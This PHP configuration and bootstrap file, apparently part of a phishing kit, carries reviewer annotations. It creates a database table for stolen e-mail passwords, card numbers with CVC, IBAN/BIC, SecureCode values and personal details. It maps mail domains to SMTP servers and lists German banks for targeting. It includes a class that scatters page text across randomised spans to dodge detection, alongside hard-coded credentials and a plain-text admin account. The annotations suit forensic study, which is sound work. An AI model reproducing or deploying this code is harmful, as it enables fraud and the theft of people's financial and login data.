- <?php
- session_start(); // a session is required by RandomHash and the CSRF-token helpers defined later in this file
- // Configuration: one array holding the site URL, database credentials, an API key, an SMTP host map, a BIN skip list and bank-name lists
- $config = [
- 'url' => 'http://' . $_SERVER['HTTP_HOST'] . '', // base URL is built from the request's Host header (client-supplied) and uses plain http
- 'mysql' => [
- 'hostname' => 'localhost',
- 'username' => 'root',
- 'password' => '123456', // database credential hard-coded in source, paired with the root account above
- 'database' => 'pp'
- ],
- 'bincodes' => [ // NOTE(review): presumably settings for a BIN-lookup service; the code that uses them is not in this file
- 'enabled' => true,
- 'api_key' => '2d974e94811161f1dda14bbf63aa9790' // API key hard-coded in source
- ],
- // All SMTP servers that do not follow the format smtp.example.com:25. Maps an e-mail domain to an SMTP host and port; NOTE(review): the code that reads this map is not in this file
- 'smtps' => [
- 'web.de' => [
- 'host' => 'smtp.web.de',
- 'port' => 587
- ],
- 'aol.com' => [
- 'host' => 'smtp.de.aol.com',
- 'port' => 587
- ],
- 'aol.de' => [
- 'host' => 'smtp.aim.com',
- 'port' => 587
- ],
- 'aim.com' => [
- 'host' => 'smtp.aim.com',
- 'port' => 587
- ],
- 'arcor.de' => [
- 'host' => 'mail.arcor.de',
- 'port' => 25
- ],
- 'bluewin.ch' => [
- 'host' => 'smtpauths.bluewin.ch',
- 'port' => 25
- ],
- 'gmail.com' => [
- 'host' => 'smtp.gmail.com',
- 'port' => 587
- ],
- 'gmail.de' => [
- 'host' => 'smtp.gmail.com',
- 'port' => 587
- ],
- 'googlemail.com' => [
- 'host' => 'smtp.gmail.com',
- 'port' => 587
- ],
- 'gmx.de' => [
- 'host' => 'mail.gmx.net',
- 'port' => 587
- ],
- 'gmx.net' => [
- 'host' => 'mail.gmx.net',
- 'port' => 587
- ],
- 'outlook.de' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'live.de' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'hotmail.de' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'live.com' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'outlook.com' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'yahoo.de' => [
- 'host' => 'smtp.mail.yahoo.com',
- 'port' => 25
- ],
- 'yahoo.com' => [
- 'host' => 'smtp.mail.yahoo.com',
- 'port' => 25
- ],
- 't-online.de' => [
- 'host' => 'securesmtp.t-online.de',
- 'port' => 25
- ],
- 'unitybox.de' => [
- 'host' => 'submit.unitybox.de',
- 'port' => 587
- ],
- 'kabelbw.de' => [
- 'host' => 'submit.kabelbw.de',
- 'port' => 587
- ],
- 'one.com' => [
- 'host' => 'send.one.com',
- 'port' => 587
- ],
- 'freenet.de' => [
- 'host' => 'mx.freenet.de',
- 'port' => 587
- ]
- ],
- // BINs for which the SecureCode prompt is skipped; every entry below is commented out, so the list is empty as posted
- 'skipBins' => [
- /*
- '457096',
- '548622',
- '548621'
- */
- ],
- // Banks (write everything in upper case, otherwise it is not recognised on Debian); read by getOB(); every name below is commented out, so each list is empty as posted
- 'banks' => [
- 'santander' => [
- //'SANTANDER CONSUMER BANK AG',
- //'SANTANDER DIREKT BANK AG',
- //'SANTANDER'
- ],
- 'vw' => [
- //'VOLKSWAGEN BANK GMBH',
- //'VOLKSWAGEN'
- ],
- 'advanzia' => [
- //'ADVANZIA BANK, S.A.',
- //'ADVANZIA'
- ],
- 'barclay' => [
- //'BARCLAYS BANK PLC',
- //'BARCLAYCARD GERMANY',
- //'BARCLAY'
- ],
- 'airp' => [
- //'LUFTHANSA AIRPLUS SERVICEKARTEN GMBH'
- ],
- 'dkb' => [
- //'DEUTSCHE KREDITBANK AG (DKB), LUFTHANSA, MILES AND MORE',
- //'DEUTSCHE KREDITBANK'
- ],
- 'lbb' => [
- //'LANDESBANK BERLIN AG'
- ],
- 'dzb' => [
- //'DZ BANK AG',
- //'DZ BANK AG DEUTSCHE ZENTRAL- GENOSSENSCHAFTSBANK'
- ],
- 'wgz' => [
- //'WGZ BANK AG WESTDEUTSCHE GENOSSENSCHAFTS-ZENTRALBANK',
- //'WGZ'
- ],
- 'volksbank' => [
- //'VOLKSBANK'
- ],
- 'spardabank' => [
- //'SPARDABANK',
- //'SPARDA'
- ],
- 'postbank' => [
- //'DEUTSCHE POSTBANK AG',
- //'POSTBANK BERLIN',
- //'POSTBANK'
- ],
- 'sparkasse' => [
- //'DEUTSCHER SPARKASSEN - UND GIROVERBAND',
- //'SPARKASSE',
- //'SPARKASSEN',
- //'SPARKASSE SCHAUMBURG',
- //'SPARKASSE MAINZ',
- //'STADTSPARKASSE'
- ],
- 'random' => [
- //'TARGOBANK AG AND CO. KGAA',
- //'CITIBANK AG',
- //'ING-DIBA AG',
- //'COMMERZBANK AG',
- //'MERCEDES-BENZ BANK AG',
- //'LANDESBANK BADEN-WUERTTEMBERG',
- //'COMDIRECT BANK AG',
- //'DEUTSCHE BANK AG',
- //'DEUTSCHE BANK PRIVAT-UND GESCHAEFTSKUNDEN AG',
- //'BAYERISCHE LANDESBANK GIROZENTRALE',
- //'BAYERISCHE LANDESBANK',
- //'SUEDDEUTSCHE BANK GMBH'
- ]
- ]
- ];
- if(!defined('CONTINUE_PDO')) { // the database bootstrap below runs unless the including script has defined CONTINUE_PDO
- // MySQL connection: connects without a database name, then creates and selects the configured database
- $pdo = new PDO(
- 'mysql:host=' . $config['mysql']['hostname'] . ';',
- $config['mysql']['username'],
- $config['mysql']['password']
- );
- $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); // database errors surface as PDOException from here on
- $pdo->query('CREATE DATABASE IF NOT EXISTS ' . $config['mysql']['database']); // the name is concatenated, not bound; it comes from $config, not from request data
- $pdo->query('use ' . $config['mysql']['database']);
- $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // use server-side prepared statements
- $pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, "SET NAMES 'utf8' COLLATE 'utf8_general_ci'"); // NOTE(review): this is a connection-time option, so setting it after connecting presumably has no effect; the exec() on the next line sets the charset
- $pdo->exec('SET NAMES \'utf8\'');
- mb_internal_encoding('UTF-8'); // The exec() that follows creates two tables on every request if they are missing: `admins`, seeded with one default account whose password is stored in plain text, and `logs`. NOTE(review): the `logs` columns (e-mail and password, full card data including CVC, IBAN/BIC, sc_1/sc_2, name, date of birth, address, phone, IP, user agent) are consistent with a credential and payment-data harvesting kit; the code that writes to `logs` is not in this file
- $pdo->exec('
- CREATE TABLE IF NOT EXISTS `admins` (
- `id` int(11) NOT NULL AUTO_INCREMENT,
- `username` varchar(255) NOT NULL,
- `password` varchar(255) NOT NULL,
- PRIMARY KEY (`id`)
- ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
- INSERT IGNORE INTO `admins` VALUES (\'1\', \'Admin\', \'123456\');
- CREATE TABLE IF NOT EXISTS `logs` (
- `id` int(11) NOT NULL AUTO_INCREMENT,
- `ip` varchar(255) DEFAULT NULL,
- `user_agent` text,
- `email` varchar(255) DEFAULT NULL,
- `password` varchar(255) DEFAULT NULL,
- `method` enum(\'creditcard\',\'bank\',\'none\') DEFAULT \'none\',
- `firstname` varchar(255) DEFAULT NULL,
- `surname` varchar(255) DEFAULT NULL,
- `dob_day` int(11) DEFAULT \'0\',
- `dob_month` int(11) DEFAULT \'0\',
- `dob_year` int(11) DEFAULT \'0\',
- `cc_number` varchar(255) DEFAULT NULL,
- `cc_expire_month` int(2) DEFAULT NULL,
- `cc_expire_year` int(4) DEFAULT NULL,
- `cc_cvc` int(4) DEFAULT NULL,
- `cc_bank` varchar(255) DEFAULT NULL,
- `cc_type` varchar(255) DEFAULT NULL,
- `cc_level` varchar(255) DEFAULT NULL,
- `cc_country` varchar(255) DEFAULT NULL,
- `cc_countrycode` varchar(255) DEFAULT NULL,
- `cc_card` varchar(255) DEFAULT NULL,
- `cc_limit` int(11) DEFAULT \'0\',
- `bank_iban` varchar(255) DEFAULT NULL,
- `bank_bic` varchar(255) DEFAULT NULL,
- `bank_name` varchar(255) DEFAULT NULL,
- `sc_1` varchar(255) DEFAULT NULL,
- `sc_2` varchar(255) DEFAULT NULL,
- `street` varchar(255) DEFAULT NULL,
- `city` varchar(255) DEFAULT NULL,
- `plz` int(5) DEFAULT NULL,
- `timestamp` varchar(255) DEFAULT \'123456789\',
- `mobilenr` varchar(255) DEFAULT NULL,
- PRIMARY KEY (`id`)
- ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=latin1;
- ');
- }
- // Classes
- class RandomHash { // Static helpers that derive per-session strings from a stored random letter and session_id(), and wrap text in one <span> per character
- public static function init() { // Stores one random letter in $_SESSION['randomLetter'] the first time it is called in a session
- if(!isset($_SESSION['randomLetter'])) {
- $_SESSION['randomLetter'] = substr(str_shuffle(str_repeat($chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil(1 / strlen($chars)) )), 1, 1); // ceil(1/52) is 1, so the alphabet is shuffled once and its second character is kept; str_shuffle() is not a cryptographic RNG
- }
- }
- public static function generate($string = '') { // Returns the session letter followed by sha1($string . sha1(session_id())): the same input gives the same value within a session and a different one in another session
- return $_SESSION['randomLetter'] . sha1($string . sha1(session_id())); // NOTE(review): the leading letter presumably keeps the value usable as a CSS class name, which must not start with a digit
- }
- public static function generateUselessKey() { // Returns the md5 hex digest of the session letter
- return md5($_SESSION['randomLetter']);
- }
- public static function stringSplitUnicode($string, $l = 0) { // Splits a UTF-8 string into chunks of $l characters, or into single characters when $l is 0
- if ($l > 0) {
- $result = [];
- $length = mb_strlen($string, 'UTF-8');
- for ($i = 0; $i < $length; $i += $l) {
- $result[] = mb_substr($string, $i, $l, 'UTF-8');
- }
- return $result;
- }
- return preg_split("//u", $string, -1, PREG_SPLIT_NO_EMPTY); // an empty pattern with the u modifier splits between every code point
- }
- public static function generateUseless($string = '') { // Returns $string with each character wrapped in a <span> that carries two generate()-derived class names
- $result = '';
- foreach(self::stringSplitUnicode($string) as $letter) {
- $result .= '<span class="' . self::generate('rnd-span') . ' ' . self::generate(self::generateUselessKey()) . '">' . $letter . '</span>'; // $letter is emitted without HTML escaping. NOTE(review): class names differ per session and visible text is split across spans, so the markup does not contain the text as a contiguous string; presumably this is meant to defeat static string matching, so detection should work on rendered text or on the span-per-character structure
- }
- return $result;
- }
- }
- RandomHash::init(); // runs on every include; relies on the session started at the top of the file because init() reads and writes $_SESSION
- // Functions
- function generateToken() { // Creates a new CSRF token (32 random bytes as 64 hex characters), stores it in $_SESSION['csrf_token'] and returns it
- if(version_compare(phpversion(), '7', '>=')) { // PHP 7 and later: random_bytes() is available
- $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
- } else if(function_exists('mcrypt_create_iv')) { // older PHP with the mcrypt extension loaded
- $_SESSION['csrf_token'] = bin2hex(mcrypt_create_iv(32, MCRYPT_DEV_URANDOM));
- } else { // last resort: OpenSSL; the return value is not checked before bin2hex()
- $_SESSION['csrf_token'] = bin2hex(openssl_random_pseudo_bytes(32));
- }
- return $_SESSION['csrf_token'];
- }
- function getToken() { // Returns the session's CSRF token, generating one first when none is stored or the stored value is empty
- if(!isset($_SESSION['csrf_token']) || empty($_SESSION['csrf_token'])) { // empty() already covers the unset case, so the isset() test is redundant
- generateToken();
- }
- return $_SESSION['csrf_token'];
- }
- function getOB($bankName) { // Maps a bank name to the lower-cased key of the first $config['banks'] group that contains a matching entry, or null when nothing matches
- global $config;
- $bankName = strtoupper($bankName); // comparison is done in upper case on both sides
- foreach($config['banks'] as $obKey => $obNames) {
- foreach($obNames as $obName) {
- if(strtoupper($obName) == $bankName || strpos(strtoupper($obName), $bankName) !== false || (count(explode(' ', $bankName)) > 0 && strpos(strtoupper($obName), explode(' ', $bankName)[0]) !== false)) { // matches on equality, on $bankName being a substring of the entry, or on the first word of $bankName being a substring of the entry; explode() returns at least one element, so the count() test always holds
- return strtolower($obKey);
- }
- }
- }
- return null; // with the configuration in this file every bank list is empty (all names commented out), so this is the only reachable return
- }
- function isLoggedIn() { // Returns true when the username and password held in the session match a row in `admins`
- global $pdo;
- if(isset($_SESSION['acp_username'], $_SESSION['acp_password'])) { // the admin password itself is kept in the session and re-checked on every call
- $stmt = $pdo->prepare('SELECT NULL FROM `admins` WHERE `username` = ? AND `password` = ? LIMIT 1'); // values are bound, not concatenated; the password is compared to the stored column as-is, and the seeded `admins` row in this file holds it in plain text
- $stmt->execute([$_SESSION['acp_username'], $_SESSION['acp_password']]);
- return $stmt->rowCount() > 0;
- }
- return false;
- }
- function getLogsCount() { // Returns the number of rows in `logs`
- global $pdo;
- $qry = $pdo->query('SELECT NULL FROM `logs`'); // selects one NULL per row instead of using COUNT(*), so the whole result set is produced just to be counted
- return $qry->rowCount(); // NOTE(review): the PDO documentation describes rowCount() for SELECT as driver-dependent
- }
- function getUserInfo($row, $filter = true) { // Returns column $row of the logged-in admin's `admins` record, HTML-escaped unless $filter is false; returns '' when not logged in or no row matches
- global $pdo;
- if(isLoggedIn()) {
- $stmt = $pdo->prepare('SELECT `' . $row . '` FROM `admins` WHERE `username` = ? AND `password` = ? LIMIT 1'); // $row is concatenated into the statement as a backtick-quoted column name, not bound. NOTE(review): this is only safe if every caller passes a fixed column name; callers are not visible in this file
- $stmt->execute([$_SESSION['acp_username'], $_SESSION['acp_password']]);
- if($stmt->rowCount() > 0) {
- $obj = $stmt->fetch(PDO::FETCH_OBJ);
- return $filter ? htmlspecialchars($obj->{$row}) : $obj->{$row}; // htmlspecialchars() is called with its default flags and encoding
- }
- }
- return '';
- }
- function getIp() { // Returns the client address, preferring the Client-IP, X-Forwarded-For and CF-Connecting-IP request headers (in that order) over REMOTE_ADDR
- $ip = $_SERVER['REMOTE_ADDR']; // the TCP peer address, used only when none of the headers below is present
- if(!empty($_SERVER['HTTP_CLIENT_IP'])) { // all three HTTP_* values come from request headers, which the client can set freely unless a trusted proxy overwrites them
- $ip = $_SERVER['HTTP_CLIENT_IP'];
- } else if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { // the header value is taken whole, so it may hold a comma-separated list rather than one address
- $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
- } else if(isset($_SERVER['HTTP_CF_CONNECTING_IP'])) { // consulted only when the two headers above are empty
- $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
- }
- return $ip; // NOTE(review): if this value is what ends up in `logs`.`ip`, that column reflects a client-settable header and not necessarily the connecting address; weigh it accordingly when analysing a recovered database
- }
- ?>